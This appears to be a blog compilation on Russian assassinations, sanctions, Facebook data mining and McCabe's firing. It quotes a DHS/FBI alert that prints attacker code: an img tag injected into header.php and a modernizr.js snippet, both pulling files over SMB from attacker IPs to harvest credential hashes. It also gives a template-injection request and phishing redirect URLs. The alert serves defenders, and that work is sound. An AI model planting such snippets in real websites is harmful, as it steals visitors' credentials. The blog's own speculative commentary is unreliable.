Assassinations of Russians, a Trend or Long Game?

A registry of foreign agents to Russia, compiled by the Justice Department, includes many of Washington’s most powerful legal, communications and lobbying firms, including Sidley Austin, Venable, APCO and White & Case. A review of those records, by the Center for Responsive Politics, found 279 registrations of Russian agents in the United States. More here.

***

“Putin’s inner circle is already subject to personal U.S. sanctions, imposed over Russia’s 2014 annexation of Ukraine’s’ Crimea region,” the Reuters news agency points out. … “But the so-called ‘oligarchs’ list’ that was released on Tuesday … covers many
people beyond Putin’s circle and reaches deep into Russia’s business elite.”

Prime Minister Dmitry Medvedev is among the 114 senior political figures in Russia’s government who made the list, along with 42 of Putin’s aides, Cabinet ministers such as Foreign Minister Sergey Lavrov, and top officials in Russia’s leading spy agencies, the FSB and GRU. The CEOs of major state-owned companies, including energy giant Rosneft and Sberbank, are also on the list.

So are 96 wealthy Russians deemed “oligarchs” by the Treasury Department, which said each is believed to have assets totaling $1 billion or more. Some are the most famous of wealthy Russians, among them tycoons Roman Abramovich and Mikhail Prokhorov, who challenged Putin in the 2012 election. Aluminum magnate Oleg Deripaska, a figure in the Russia investigation over his ties to former Trump campaign chairman Paul Manafort, is included.

Russian Deputy Prime Minister Arkady Dvorkovich dismissed the list as simply a “who’s who” of Russian politics. He told Russian news agencies Tuesday he wasn’t surprised to find his name on the list, too, saying that it “looks like a ‘who’s who’ book.” Dvorkovich stopped short of saying how Russia would react to it, saying the Kremlin would “monitor the situation.” More here.

*** So when there are murder cases of Russian asylees in Britain, what are the agencies in the United States thinking?

Putin foe shot dead on Moscow street | New York Post photo

photo

Litvinenko: Not first Putin critic to end up dead - CNN.com photo

Well there was Mikhail Lesin, a former friend of Putin found dead in his hotel in Dupont Circle, Washington DC. Then there was Operation Ghost Stories, the massive spy swap.

Imagine what the context and case reference is for the FBI when it comes to Russian operations in the United States and in allied countries.Or how many planes have been shot out of the sky where clues and evidence point to Russia? More explained in video below.

Beyond the attempted assassination of Skripal and his daughter in Salisbury two weeks ago, there was yet another confirmed death.

Whoever is behind the murder of a prominent Russian exile, who believed he was on a Kremlin hit list, managed to get inside his home without breaking in, police believe.

Nikolai Glushkov, 68, was found dead at home last week at his home in southwest London, and officers are now hunting for the culprits. His official cause of death is “compression to the neck.”

Before his death, Glushkov warned that a close friend of his had been murdered, and that he would be next.

In a Monday morning update on the investigation, the Metropolitan Police said they examined Glushkov’s house and found no signs of forced entry.

*** How bad is this trend?

4 Days of Food Left…Panic? National Grid Hacked

If there is no transportation, there is no food, medicine or basic supplies….what country is ready to deal with this?

British cities would be uninhabitable within days and the country is only a few meals from anarchy if the National Grid was taken down in a cyber attack or solar storm, disaster and security experts have warned.

Modern life is so reliant on electricity that a prolonged blackout would quickly lead to a loss of water, fuel, banking, transport and communications that would leave the country “in the Stone Age”.

Russia plot to cut off UK with hackers taking down ... photo

The warning comes weeks after the Defence Secretary, Gavin Williamson, said Russia had been spying on the UK’s energy infrastructure and could cause “thousands and thousands and thousands” of deaths if it crippled the power supply.

***

The U.S. government has just released an important cybersecurity alert that confirms Russian government cyberattacks targeting energy and other critical infrastructure sectors in the United States.

While there has recently been a significant rise in cyberattacks in these industries, up to now we’ve only been able to speculate on who the actors are, or what their motives may be. In this case the threat actor and their strategic intent has been clearly confirmed, something the U.S. government rarely does publicly.

In addition, the US-CERT alert provides descriptions of each stage of the attack, detailed indicators of compromise (IOCs), and a long list of detection and prevention measures. Many of the attack tactics are like Dragonfly 2.0, so much so that one might call this an expanded playbook for Dragonfly. The Nozomi Networks solution ships today with an analysis toolkit that identifies the presence of Dragonfly 2.0 IOCs.

This article is intended to help you gain perspective on this recent alert, provide additional guidance on what security measures to take, and describe how the Nozomi Networks solution can help.

Russian-Cyberattacks-on-Infrastructure

U.S. energy facilities, like this one, are one of the critical infrastructure targets of the Russian cyberattacks.

Multi-Stage Campaigns Provide Opportunities for Early Detection

The US-CERT alert characterizes this attack as a multi-stage cyber intrusion campaign where Russian cyber actors conducted spear phishing and gained remote access into targeted industrial networks. After obtaining access, the threat vectors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).

This pattern of behavior is typical of APTs (Advanced Persistent Threats). APTs occur over an extended period, meaning there is an opportunity to detect and stop them before damage is done. With the right technology monitoring the industrial network, it is much harder for them to go unobserved before their final attack.

In this case the Russian cyberattacks started by infecting staging targets, which are peripheral organizations, such as trusted third-party suppliers, as pivot points for attacking the final intended targets.

The attackers used a multitude of tactics involving information relevant to industrial control professionals for initial infection of the staging targets. Examples include:

  • Altering trade publication websites
  • Sending emails containing resumes for ICS personnel as infected Microsoft Word attachments
  • Analyzing publicly available photos that inadvertently contained information about industrial systems

The credentials of staging targets’ staff were in turn used to send spear phishing emails to the staff of the intended targets. They received malicious .docx files, which communicated with a command and control (C2) server to steal their credentials.

The SMB (Server Message Block) network protocol was used throughout the spear phishing phases to communicate with external servers, as was described for the Dragonfly 2.0 attacks.This is a distinctive tactic. SMB is usually only used to communicate within LANs, not for outbound communications. Now that this is known, asset owners should ensure their firewalls are locked down for outbound service restrictions.

The credentials of the intended targets were used to access victim’s networks. From there, the malware established multiple local administrator accounts, each with a specific purpose. The goals ranged from creation of additional accounts to cleanup activity. For the report, click here.

***

What Is Known

Forensic analysis shows that the threat actors sought information on network and organizational design and control system capabilities within the organization. In one instance, the report says, the threat actors downloaded a small photo from a publicly accessible human resource page, which, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background. The threat actors also compromised third-party suppliers to download source code for several intended targets’ websites. They also attempted to remotely access corporate web-based email and virtual private network (VPN) connections.

Once inside the intended target’s network, the threat actors used privileged credentials to access domain controllers via remote desktop protocols (RDP) and then used the batch scripts to enumerate hosts and users, as well as to capture screenshots of systems across the network.

The threat is inside. US-CERT on March 15 warned that threat actors associated with the Russian government had infiltrated ICS and SCADA systems at power plants using a variety of tactics. This image is a DHS reconstruction of a screenshot fragment of a human machine interface (HMI) that the threat actors accessed. Source: US-CERT

The threat is inside. US-CERT on March 15 warned that threat actors associated with the Russian government had infiltrated ICS and SCADA systems at power plants using a variety of tactics. This image is a DHS reconstruction of a screenshot fragment of a human machine interface (HMI) that the threat actors accessed. Source: US-CERT

Along with publishing an extensive list of indicators of compromise, the DHS and FBI recommended that network administrators review IP addresses, domain names, file hashes, network signatures, and a consolidated set of YARA rules for malware associated with the intrusion authored by the National Cybersecurity and Communications Integration Center. YARA is an open-source and multiplatform tool that provides a mechanism to exploit code similarities between malware samples within a family.

Facebook, Artificial Intelligence Op, Manipulating You

Is any of this illegal? Well, yet to be determined because no one asks the questions, much less do we know what questions to ask….

It boils down to this: ‘facts don’t matter, it is what readers believe’ or as is in A Few Good Men, a dream world is it does not matter what I believe, it matters what I can prove. Artificial intelligence is proven, believed and kinda sorta factual?

photo

Facebook says it has saved more than $2 billion from its investments in Open Compute. But five years is an eternity on the Internet, and now every big tech company is out to conquer a different problem. Serving up content cheaply can be done, but figuring out what kind of content to serve among billions of posts is still a challenge. So, just as Facebook set out to rebuild the hardware industry half a decade ago with the Open Compute project, it has more recently created an internal platform to harness artificial intelligence so it can deliver exactly the content you want to see. And it wants to build this “machine learning” platform to scale. (“Machine learning” is a form of artificial intelligence that allows computers to learn how to operate without being pre-programmed.) “We’re trying to build more than 1.5 billion AI agents—one for every person who uses Facebook or any of its products,” says Joaquin Candela, the head of the newly created Applied Machine Learning group. “So how the hell do you do that?”

FBLearner Flow combines several machine-learning models to process several billion data points, drawn from the activity of the site’s 1.5 billion users, and forms predictions about thousands of things: which user is in a photograph, which message is likely to be spam. The algorithms created from FBLearner Flow’s models help define what content appears in your News Feed and what advertisements you see.

It would be easy to jump to the conclusion that Facebook’s use of artificial intelligence will help eliminate some of the company’s 13,000 employees. The reality couldn’t be more different, says chief technology officer Mike Schroepfer. AI is helping Facebook augment the capabilities of its human engineers. “We’re able to do things that we have not able to do before,” he says. More here.

***

Stop clicking the bait on Facebook, you are participating in psychometic testing for Facebook.

Predicting individual traits and attributes based on various cues, such as samples of written text (8), answers to a psychometric test (9), or the appearance of spaces people inhabit (10), has a long history. Human migration to digital environment renders it possible to base such predictions on digital records of human behavior. It has been shown that age, gender, occupation, education level, and even personality can be predicted from people’s Web site browsing logs (1115). Similarly, it has been shown that personality can be predicted based on the contents of personal Web sites (16), music collections (17), properties of Facebook or Twitter profiles such as the number of friends or the density of friendship networks (1821), or language used by their users (22). Furthermore, location within a friendship network at Facebook was shown to be predictive of sexual orientation (23).

This study demonstrates the degree to which relatively basic digital records of human behavior can be used to automatically and accurately estimate a wide range of personal attributes that people would typically assume to be private. The study is based on Facebook Likes, a mechanism used by Facebook users to express their positive association with (or “Like”) online content, such as photos, friends’ status updates, Facebook pages of products, sports, musicians, books, restaurants, or popular Web sites. Likes represent a very generic class of digital records, similar to Web search queries, Web browsing histories, and credit card purchases. For example, observing users’ Likes related to music provides similar information to observing records of songs listened to online, songs and artists searched for using a Web search engine, or subscriptions to related Twitter channels. In contrast to these other sources of information, Facebook Likes are unusual in that they are currently publicly available by default. However, those other digital records are still available to numerous parties (e.g., governments, developers of Web browsers, search engines, or Facebook applications), and, hence, similar predictions are unlikely to be limited to the Facebook environment. More here.

***

Everything you need to know about Facebook and Cambridge ... photo

So why does Facebook feel like it is a victim of Cambridge Analytica? Well it seems Cambridge Analytica was a customer of Facebook and bought customer data for their own use. Facebook feels betrayed but how about that relationship? Facebook censors and mines data for their own political missions and frankly Cambridge Analytica does the same thing. These two companies along with several others and hired outside data and espionage types are changing the whole balance and equilibrium of the globe, question is to what end?

***

The data company that helped push Donald Trump to victory is now hoping it will win two lucrative contracts to boost White House policy messaging and to expand sales for the Trump Organization.

Cambridge Analytica, a data mining firm that uses personality profiling, claims Steve Bannon as a board member, who will soon officially be Mr Trump’s chief strategist.

The firm is backed by billionaire investor Robert Mercer, whose daughter Rebekah sits on the 16-person Trump transition team.

The London-based firm said it has marketing and psychological data on around 230 million Americans, which could help Mr Trump to increase his real estate business, or scope out the policy landscape for his government. More here.

In case you are wondering about global opposition research and affecting power to power with global leaders, check out this video:

Now this cat may appear to be quite an odd whistleblower but….

Christopher Wylie, who worked for data firm Cambridge Analytica, reveals how personal information was taken without authorisation in early 2014 to build a system that could profile individual US voters in order to target them with personalised political advertisements. At the time the company was owned by the hedge fund billionaire Robert Mercer, and headed at the time by Donald Trump’s key adviser, Steve Bannon. Its CEO is Alexander Nix.

 

Details on the Firing of FBI Dep. Director Andrew McCabe

Just after midnight Saturday, President Donald Trump reacted to the news in a Twitter message:

“Andrew McCabe FIRED, a great day for the hard working men and women of the FBI – A great day for Democracy,” the president wrote, “Sanctimonious James Comey was his boss and made McCabe look like a choirboy. He knew all about the lies and corruption going on at the highest levels of the FBI!” More detail here including the timeline with former FBI Director James Comey.

ProShare Advisors LLC Cuts Position in Anadarko Petroleum ... photo

The termination, which was triggered by internal reviews and comes a little more than day before McCabe was set to retire, sparks a war of words between McCabe and President Donald Trump.

Politico: Attorney General Jeff Sessions fired former FBI Deputy Director Andrew McCabe Friday night, dismissing the longtime bureau veteran who had been publicly pilloried by President Donald Trump and sparking a new war of words between McCabe and Trump.

Sessions said the firing — carried out a little more than a day before McCabe was set to retire from the FBI — was triggered by internal reviews that concluded McCabe violated Justice Department policies and was not forthcoming with investigators probing FBI actions before the 2016 presidential election.

Justice Department officials determined that “McCabe had made an unauthorized disclosure to the news media and lacked candor — including under oath — on multiple occasions,” the attorney general said in a statement.

“The FBI expects every employee to adhere to the highest standards of honesty, integrity, and accountability,” Sessions added.

McCabe quickly lashed back Friday, linking the firing to the repeated public flogging he faced from Trump. The former FBI No. 2 also tied his dismissal to the fact that he can support former FBI Director James Comey’s account that he was fired because of an unwillingness to shut down the investigation into the Trump campaign’s alleged ties to Russia.

“Here is the reality: I am being singled out and treated this way because of the role I played, the actions I took, and the events I witnessed in the aftermath of the firing of James Comey,” McCabe said in a statement. “The release of this report was accelerated only after my testimony to the House Intelligence Committee revealed that I would corroborate former Director Comey’s accounts of his discussions with the President.”

“The fact that [Trump] has said all these things about me, he’s made all these attacks, he’s gone on and on — you can’t dismiss it, that’s the problem,” McCabe told POLITICO in an interview earlier this month. “That’s why presidents don’t typically attack senior executives in the FBI, because they would never even want to create the impression that that sort of improper influence could be taking place.”

Shortly after midnight, Trump hit back, tweeting: “Andrew McCabe FIRED, a great day for the hard working men and women of the FBI – A great day for Democracy. Sanctimonious James Comey was his boss and made McCabe look like a choirboy. He knew all about the lies and corruption going on at the highest levels of the FBI!”

Prominent Democratic lawmakers expressed skepticism about Sessions’ decision, but seemed cautious about denouncing the action until Inspector General Michael Horowitz’s review is released. Many Democrats have praised Horowitz, whose office prepared the report that appears to have harshly criticized McCabe.

“In the absence of the IG report, it’s impossible to evaluate the merits of this harsh treatment of a 21-year FBI professional. That it comes after the President urged the DOJ to deprive McCabe of his pension, and after his testimony, gives the action an odious taint,” the top Democrat on the House Intelligence Committee, Adam Schiff of California, tweeted.

“I am going to reserve judgment on Mr. McCabe’s conduct until the Inspector General completes his report,” the House Judiciary Committee’s ranking Democrat, Jerrold Nadler of New York, said. “But I am certain that President Trump has attacked the reputation of a career public servant, and his wife, and the rest of the leadership of the Department of Justice—and those attacks leave us all questioning whether the Attorney General has made the right decision.”

By contrast, Rep. Lee Zeldin (R-N.Y.) quickly embraced Sessions’ move.

“Decisive, appropriate, timely action by @jeffsessions to fire Andrew McCabe. DOJ/FBI are legendary, historic, important agencies filled w/amazing men & women held to highest standards,” Zeldin wrote on Twitter. “McCabe was a ringleader of rogue actors who were a shameful exception at top; not the norm.”

Mark Meadows, the leader of the conservative House Freedom Caucus, said that McCabe’s termination showed the need to add another special counsel to probe the FBI.

“This decision is not surprising based on information that continues to unfold on a daily basis,” Meadows said.

The embattled FBI deputy, who was due to officially retire on Sunday, had stepped down in January after facing repeated public and private rebukes from the president. Trump criticized his handling of the Hillary Clinton email investigation and accused McCabe of bias, citing his wife’s political ties to a prominent Democrat.

McCabe has been at the center of a Justice Department inspector general examination of the bureau’s activities prior to the 2016 election, including the investigation into the Clinton email matter. The FBI’s Office of Professional Responsibility had recommended that McCabe be fired, citing findings from the Justice Department’s inspector general’s report, which is expected to be released within weeks.

Sessions’ statement did not detail the precise allegations against McCabe. However, the fired FBI official’s own statement and text messages released by the Senate Judiciary Committee indicate that investigators concluded he ordered the disclosure of information to a Wall Street Journal reporter about an ongoing investigation into the Clinton Foundation.

As McCabe was under fire over donations his wife received for her Democratic campaign for the Virginia Senate, he indicated he had pressed to keep the foundation-related probe advancing even as Justice Department officials questioned its merit.

“This entire investigation stems from my efforts, fully authorized under FBI rules, to set the record straight on behalf of the Bureau, and to make clear that we were continuing an investigation that people in DOJ opposed,” McCabe said. The disclosure “was not a secret, it took place over several days, and others, including the Director, were aware of the interaction with the reporter,” the former FBI No. 2 added.

McCabe has pushed back at the timing of the inspector general’s report, suggesting that Trump’s frequent criticism of him has driven the speed with which the investigation concluded with a recommendation to terminate him.

“I have never before seen the type of rush to judgment and rush to summary punishment that we have witnessed in this case,” McCabe’s attorney Michael Bromwich said in a statement. ” This is simply not the way such matters are generally handled in the DOJ or the FBI. It is deeply disturbing.”

The president of the FBI Agents Association, Thomas O’Connor, issued a statement Friday night that appeared to express concern that politics may have influenced McCabe’s dismissal.

“While the FBIAA does not comment on personnel matters, the Association remains fully committed to ensuring that every FBIAA member is provided appropriate procedural protections. The FBIAA also strongly believes that personnel decisions should never be politicized,” O’Connor said.

Sessions’ statement indicated that the firing was also endorsed by the Justice Department’s top career official, Associate Deputy Attorney General Scott Schools. The statement did not indicate why the disciplinary process, which can often take more than a year, appears to have been dramatically accelerated in McCabe’s case.

After stepping down in January, McCabe went on “terminal leave,” intending to remain on the government payroll until his planned retirement on March 18. The firing is likely to cost McCabe hundreds of thousands of dollars by rendering McCabe ineligible for his full government pension and by delaying his right to any payout for almost seven years. Legal experts say McCabe’s options to challenge the firing are few because most FBI employees have little legal recourse against attempts to punish them over alleged misconduct.

A spokeswoman for McCabe declined to comment Friday night on whether he is planning a lawsuit.

McCabe told POLITICO earlier this month that he was “essentially removed from my job” in January following information “shared with” Christopher Wray, the FBI’s current director, “before the investigation was concluded.”

“I refused to serve in any other capacity other than deputy, and so I left on terminal leave,” McCabe said. Trump announced in June that he would nominate Wray to replace Comey. Wray took over the job in August, after being confirmed by the Senate.

Trump had questioned McCabe’s impartiality, citing the fact that his wife received funds from then-Virginia Gov. Terry McAuliffe, a Democrat and longtime political ally of Clinton, in a failed bid for the State Legislature in 2015.

“How can FBI Deputy Director Andrew McCabe, the man in charge, along with leakin’ James Comey, of the Phony Hillary Clinton investigation (including her 33,000 illegally deleted emails) be given $700,000 for wife’s campaign by Clinton Puppets during investigation?” Trump tweeted in December. Trump abruptly fired Comey as FBI director in May, saying he was “unable to effectively lead the Bureau.”

In a separate post, Trump added that McCabe was “racing the clock to retire with full benefits.”

Last summer, Trump questioned why Sessions had not already replaced McCabe, whom he labeled a “friend” of Comey’s.

The firing raised concerns about the integrity of the FBI’s examination of possible Russian election meddling in 2016 and potential ties to Trump campaign aides, an investigation that McCabe subsequently took charge of as acting director of the bureau.

McCabe began his bureau career at the New York field office in 1996. In January 2016, under former President Barack Obama, he was appointed to the bureau’s No. 2 position by Comey.

CERT/FBI Declaration of Russia Hacking U.S. Infrastructure

US sanctions Russia for election interference, cyberattacks

The US government takes action against Russia for misdeeds including what it’s calling the “most destructive cyberattack in history.”

CNet: The White House has announced an array of sanctions against Russia for meddling in US elections and for broader hacking efforts, including one incident it called “most destructive and costly cyberattack in history.”

The US government unveiled the sanctions Thursday morning, saying they were prompted by Russia’s online propaganda campaign during the US elections, massive hacks of Yahoo and attempted cyberattacks against electrical grids in the US.

The government singled out Russia’s role in the NotPetya attack, a piece of malware that was disguised as ransomware but actually designed to destroy data. Last month, the Trump Administration attributed the attack to Russia, saying it caused billions of dollars in damage in Europe, Asia and the Americas.

US sanctions on Russia coming soon | Free Malaysia Today

“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” Treasury Secretary Steven Mnuchin said in a statement. The sanctions, he said, will “hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the US financial system.”

The sanctions come after an investigation by the Department of Homeland Security and the FBI.

The sanctions fall on 19 individuals and five Russian entities, including the Internet Research Agency, a trolling farm designed to meddle in the 2016 presidential election through divisive posts on social media. They also target Russia’s intelligence agency, known as the Federal Security Service or FSB, and the country’s military intelligence organization, the GRU.

The Russian embassy didn’t respond to a request for comment.

‘A long-overdue step’

On Capitol Hill, the sanctions fed into a continuing controversy over Russian meddling in American democratic processes.

“This is a welcome, if long-overdue, step by the Trump administration to punish Russia for interfering with the 2016 election,” Sen. Mark Warner, a Democrat from Virginia, said in a statement.

Still, the vice chairman of the Senate intelligence committee criticized the sanctions because they “do not go far enough,” pointing out that many of the named entities were either already sanctioned under the Obama administration or have been charged by the Justice Department.

“With the midterm elections fast approaching,” he said, “the Administration needs to step it up, if we have any hope of deterring Russian meddling in 2018.”

Senior national security officials said the FSB was directly involved in hacking millions of Yahoo accounts, while the GRU was behind the interference in the 2016 presidential election and the NotPetya cyberattack.

The sanctions fall under the Countering America’s Adversaries Through Sanctions Act, which authorizes pushback against “aggression by the governments of Iran, the Russian Federation and North Korea.”

Investigators found evidence of Russian attempts to hack into the US electric grid through spear-phishing tactics, senior national security officials said. The attacks have been going on since March 2016, targeting multiple US government offices, as well as energy, water, nuclear and critical manufacturing companies.

The DHS and the FBI provided details in a technical alert released Thursday, calling the actions a “multistage intrusion” through which Russian hackers were able to gain remote access into energy sector networks.

How Russian hackers got into Yahoo accounts - Business Insider photo

Systems Affected

  • Domain Controllers
  • File Servers
  • Email Servers

Overview

This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.

DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).

For a downloadable copy of IOC packages and associated files, see:

Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.

Description

Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.

Analysis by DHS and FBI, resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1] (link is external)

This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”

Technical Details

The threat actors in this campaign employed a variety of TTPs, including

  • spear-phishing emails (from compromised legitimate account),
  • watering-hole domains,
  • credential gathering,
  • open-source and network reconnaissance,
  • host-based exploitation, and
  • targeting industrial control system (ICS) infrastructure.

Using Cyber Kill Chain for Analysis

DHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework.

 

Stage 1: Reconnaissance

The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.

Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.

 

Stage 2: Weaponization

Spear-Phishing Email TTPs

Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2]

 

Use of Watering Hole Domains

One of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using SMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file “header.php”, a legitimate PHP file that carried out the redirected traffic.

<img src=”file[:]//62.8.193[.]206/main_logo.png” style=”height: 1px; width: 1px;” />

In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below:

var i = document.createElement(“img”);

i.src = “file[:]//184.154.150[.]66/ame_icon.png”;

i.width = 3;

i.height=2;

Stage 3: Delivery

When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled “document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)

In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.

 

Stage 4: Exploitation

The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects to http://bit[.]ly/2m0x8IH link, which redirected to http://tinyurl[.]com/h3sdqck link, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained input fields for an email address and password mimicking a login page for a website.

When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. [1] (link is external)

 

Stage 5: Installation

The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.

 

Establishing Local Accounts

The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”.